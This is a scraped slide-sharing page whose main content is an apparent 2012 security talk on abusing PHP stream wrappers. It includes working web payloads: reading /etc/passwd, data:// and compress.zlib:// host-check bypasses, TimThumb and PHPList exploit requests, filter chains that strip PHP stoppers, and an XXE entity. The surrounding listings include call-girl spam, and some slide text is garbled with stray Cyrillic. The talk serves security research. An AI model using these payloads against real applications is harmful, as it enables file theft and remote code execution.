Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 

Recently uploaded (20)

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 

On secure application of PHP wrappers

  • 1. PHP Wrappers Aleksey Moskvin Positive Technologies May 2012
  • 2. Streams Streams
  • 3. Data reading Wrappers $handle = fopen($file, "rb"); while (!feof($handle)) { $contents .= fread($handle, 8192); } fclose($handle); You can get data not only from local files! $file = 'ftp://user:password@10.0.0.1/pub/file.txt'; $file = „http://127.0.0.1/server-status‟; $file = „php://fd/XXX‟; $file = „expect://ls‟;
  • 4. Data writing Read the file copy ('/etc/passwd' , 'php://output'); file_put_contents(„php://output', file_get_contents('/etc/hosts')); Modify the file, and then write it to the disk move_uploaded_file($_FILES[“attach”]["tmp_name"], “php://filter/string.rot13/resource=./upload/user_attach”); Write data into Apache error_log (PHP >= 5.3.6) error_log („Bypass root perm!‟, 3, „php://fd/2‟);
  • 5. Wrapper zip:// Requirements: PHP is compiled with zip support. You can use zip:// wrapper in case allow_url_fopen = Off. zip:// wrapper allows you to access file inside the archive with an arbitrary name. $zip = new ZipArchive; if ($zip->open('/tmp/any_name_zip_arxiv',1) ) { $zip->addFromString( '/my/header.html', '<?php print_r(ini_get_all());„ ); } $zip->close(); print file_get_contents('zip:///tmp/any_name_zip_arxiv#/my/header.html');
  • 6. NULL Byte Replacement $s = $_POST[„path‟]; include $s.‟/header.html‟; allow_url_include directive restricts the usage of http:// ftp:// data:// wrappers. magic_quotes_gpc directive restricts the usage of NULL byte in local files including. If you can create a zip archive, you can use zip:// wrapper: path=zip:///tmp/any_name_zip_arxiv#/my This is effective if allow_url_fopen=Off and magic_quotes_gpc=On An arbitrary archive name allows you to use temporary files created while content loading. Use hpinfo() to get temporary file path: https://rdot.org/forum/showthread.php?t=1134
  • 7. Wrapper data:// (RFC 2397) According to RFC 2379, data:// wrapper supports more extended syntax: dataurl := "data:" [ mediatype ] [ ";base64" ] "," data mediatype := [ type "/" subtype ] *( ";" parameter ) data := *urlchar parameter := attribute "=" value Wrapper feature: mediatype can be absent or can be filled in by arbitrary values: data://anytype/anysubtype;myattr!=V@l!;youattr?=Op$;base64
  • 8. Trick: function stream_get_meta_data Modify array items returned by stream_get_meta_data $password = 'secret'; $file = $_POST['file']; $fp = fopen( $file, 'r'); extract(stream_get_meta_data($fp)); if ( $mediatype === 'text/plain') { ... } if ( $_COOKIE['admin'] === $password) { ... } Rewrite $password variable POST DATA: file=data://text/plain;password=mysecret;base64, Bypass authorization: Cookie: admin=mysecret
  • 9. Wrapper compress.zlib:// compress.zlib:// wrapper does not modify ordinary file content readfile('compress.zlib:///etc/hosts'); Local file path can include arbitrary folders name $url = 'compress.zlib:///http://../etc/hosts'; if (preg_match('/http:///', $url) == true) { echo "Yes!"; }
  • 10. Any Data in parse_url parse_url function handles not only URLs $url_info = parse_url($_POST[„src‟]); if ($url_info['host'] === 'img.youtube.com') { $name = str_replace('/', '', substr($url_info['path'], 4)); copy( $src, './'.$name ); } Loading images from img.youtube.com: POST DATA: src=http://img.youtube.com/vi/Uvwfxki7ex4/0.jpg Bypass host name checks and create arbitrary files: POST DATA: src=data://img.youtube.com/aaamy.php?;base64,SSBsb3ZlIFBIUAo Local File Manipulation: POST DATA: src=compress.zlib://img.youtube.com/../path/to/local/file;
  • 11. Bypass preg_match validate Filter bypass based on preg_match POST DATA: src=data://text/plain;charset=http://w?param=anyval;base64,SSBsb3ZlIFBIUAo POST DATA: src=compress.zlib://youtube.com/../http://?/../../path/to/local/file function validate_url ($url) { $pattern = "/b(?:(?:https?)://|www.)[-a-z0-9+&@#/%?=~_|!:,.;]*[-a-z0-9+&@#/%=~_|]/i"; return preg_match ($pattern, $url); } $src = $_POST['src']; if (!validate_url ($src)) display_error ('invalid url');
  • 12. Arbitrary File Loading in TimThumb TimThumb is a popular script used for image resize. Public Exploit for v 1.32 (08/2011): http://www.exploit-db.com/exploits/17602 New Wrappers Exploit for v1.34 (revision 145) function check_external ($src) { ………………… if (!validate_url ($src)) display_error ('invalid url'); $url_info = parse_url ($src); ................... if ($url_info['host'] == 'www.youtube.com' || …) parse_str($url_info['query']); .................. $fh = fopen($local_filepath, „w‟); $ch = curl_init($src); ………………….. $files_infos = getimagesize ($local_filepath); if (empty($file_infos[„mime‟]) || …..) unlink($local_filepath); ……………………………… http://www.youtube.com/?local_filepath=php://filter/resource%3D./path/to/.php &url_info[host]=img.youtube.com&src=http://mysite.com/thumb.txt
  • 13. File Manipulation in TimThumb v1.35 Requirements: curl_init function is diabled on the target server. ………………… if (!$img = file_get_contents ($src)) { display_error ('error....'); } if (file_put_contents ($local_filepath, $img) == FALSE) неопределенного фильтра does not influence the results of other filters { display_error ('error.....'); } ………………… Create a file with arbitrary content: data://img.youtube.com/e;charset=http://w?&var=;base64,SSBsb3ZIIFBIUAo «Read» local file: compress.zlib://youtube.com/../http://?/../../path/to/local/file
  • 14. Secret features of php://filter wrapper php://filter allows users to filter streams while opening. Filter the file content: readfile('php://filter/read=string.toupper|anyfilter|string.rot13/resource=./file.php'); Unknown filter does not influence the results of other filters. convert.base64-decode and string.strip_tags filters can delete data from the stream. Stephan Esser used convert.base64-decode filter features in an exploit for Piwik in 2009: http://sektioneins.de/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability Since 2009, two important questions are not solved: How to delete «unused» data? What are the advantages of filters?
  • 15. Base64 algorithm: encoding RFC 2045, section 6.8 describes Base64 algorithm. Base64 alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  • 16. Base64 algorithm: decoding While decoding, only characters of base64 alphabet are handled. The input string is divided into parts by 4 characters, every part is handled separately.
  • 17. Example. “Instrusion” of stopper You can delete some data using base64_decode several times. $content = "; <? die; ?>n"; $content .= "[/Ly8vVTFOQ1RXSXpXbXhKUmtKSlZVRTlQUT09]n"; $file = 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode /resource=./PoC'; file_put_contents($file, $content); “Stub”: /Ly8v ( base64_decode('Ly8v') == '///‟ ) convert.base64-decode filter does not handle strings with equal sign in the middle. $s = 'php://filter/read=convert.base64-decode/resource=data:,dGVzdA==CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
  • 18. Filter string.strip_tags Filter string.strip_tags speeds up the “extrusion” process $content = "; <? die; ?>n"; $content .= "=3C=3Fprint('PHP');n"; $file = 'php://filter/write=string.strip_tags|convert.quoted-printable-decode/resource=./PoC'; $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); // =3C file_put_contents($file, $content); convert.quoted-printable-decode filter handles strings symbol by symbol. Characters in Quoted-Printable ( RFC2045, 6.7 chapter) format are modified into characters of 8 bit code page. Modification into Quoted-Printable format. $quoted_printable_lt = '='.strtoupper(dechex(ord('<'))); convert.quoted-printable-decode filter is not effective if the string does not include an equal sign followed by hexadecimal character code. $s = 'php://filter/read=convert.quoted-printable-decode/resource=data:,dGVz=CRAP'; var_dump(file_get_contents($s)); // print: string(0) ""
  • 19. TextPattern: Upload Arbitrary Files (I) File with .php extension stores information about comments‟ authors. $file = $prefs['tempdir'].DS.'evaluator_trace.php'; if (!file_exists($file)) { $fp = fopen($file, 'wb'); if ($fp) fwrite($fp, "<?php return; ?>n". "This trace-file tracks saved comments. (created ". Пп safe_strftime($prefs['archive_dateformat'],time()).")n". "Format is: Type; Probability; Message “ . “(Type can be -1 => spam, 0 => moderate, 1 => visible)nn");
  • 21. Partial File Reading in PHPList <= 2.10.13 (I) The reason is a possibility to modify the structure of $_FILES array http://isisblogs.poly.edu/2011/08/11/php-not-properly-checking-params/ if (is_array($_FILES)) { ## only avatars are files foreach ($_FILES['attribute']['name'] as $key => $val) { if (!empty($_FILES['attribute']['name'][$key])) { $tmpnam = $_FILES['attribute']['tmp_name'][$key]; $size = $_FILES['attribute']['size'][$key]; if ($size < MAX_AVATAR_SIZE) { $avatar = file_get_contents($tmpnam); Sql_Query(sprintf('replace into %s (userid,attributeid,value) values(%d,%d,"%s")',$tables["user_attribute"],$id,$key,base64_encode($avatar))); The follow HTML form allows an attacker to upload files into a database. <form action="http://localhost/lists/admin/?page=user&id=1" method="POST” enctype="multipart/form-data" > <input type="file" name="attribute[tmp_name]["> <input type="file" name="attribute[size]["> <input type="file" name="attribute[[tmp_name]"> <input type="file" name="attribute[name]["> <input name="change" value="Save Changes" type="submit"> </form>
  • 22. Partial File Reading in PHPList <= 2.10.13 (II)
  • 23. getimagesize check bypass (I) With filters, you manage not only to delete stoppers but also modify images checked on the basis of getimagesize function. If you manage to inject data into EXIF image
  • 24. getimagesize check bypass (II) extract($_REQUEST); ….. include $templatedir.'/header.html'; ..... if (!empty($_FILES) ) { $file_info = getimagesize($_FILES['image']['tmp_name']); if($file_info['mime'] == 'image/jpeg') { if ( move_uploaded_file( $_FILES['image']['tmp_name'], $folder.'/avatar.jpg') ) ...... Load an image, but a zip archive with /my/header.html file is stored on the server. folder=php://filter/write=string.strip_tags|convert.base64-decode/resource=/tmp/ Add the file into the zip archive templatedir=zip:///tmp/avatar.jpg#/my
  • 25. Files with arbitrary content If you manage to create a file with arbitrary content, you can: create a session file and exploit the unserialize bug via session_start(); create a zip archive and exploit RFI; create/rewrite files htaccess/htpasswd; create or rewrite templates.
  • 26. parse_ini_file atack parse_ini_file function handles local files only. session_start(); $_SESSION['admin'] = $_POST['name']; ....... $var = parse_ini_file($inifile); require $var['require']; Create session file /tmp/sess_dffdsdf24gssdgsd90 admin|s:68:"Ly8vVnpOYWFHTnNNRXRqYlZaNFpGZHNlVnBVTUdsTU1sWXdXWGs1YjJJelRqQmplVWs5" With filters, transform the session file into format suitable for parse_ini_file function. php://filter/read=convert.base64-decode|convert.base64-decode| convert.base64-decode/resource= /tmp/sess_dffdsdf24gssdgsd90
  • 27. XXE Attack Read files via XML Injection. <?xml version='1.0'?> <!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64- encode/resource=http://127.0.0.1/server-status"> ]> <scan>&test;</scan> simplexml_load_file function and DOMDocument::load method supports wrappers.
  • 28. Limitations for the usage of wrappers By default, you are not allowed to use wrappers in includes with installed Suhosin (even if allow_url_include = On). For example, zip:// wrapper is available as soon as whitelist includes it: suhosin.executor.include.whitelist = “zip” file_exists, is_file, filesize functions return FALSE in case wrappers php://filter, zip://, data:// are used as file names.
  • 29. Thank you for your attention! Questions?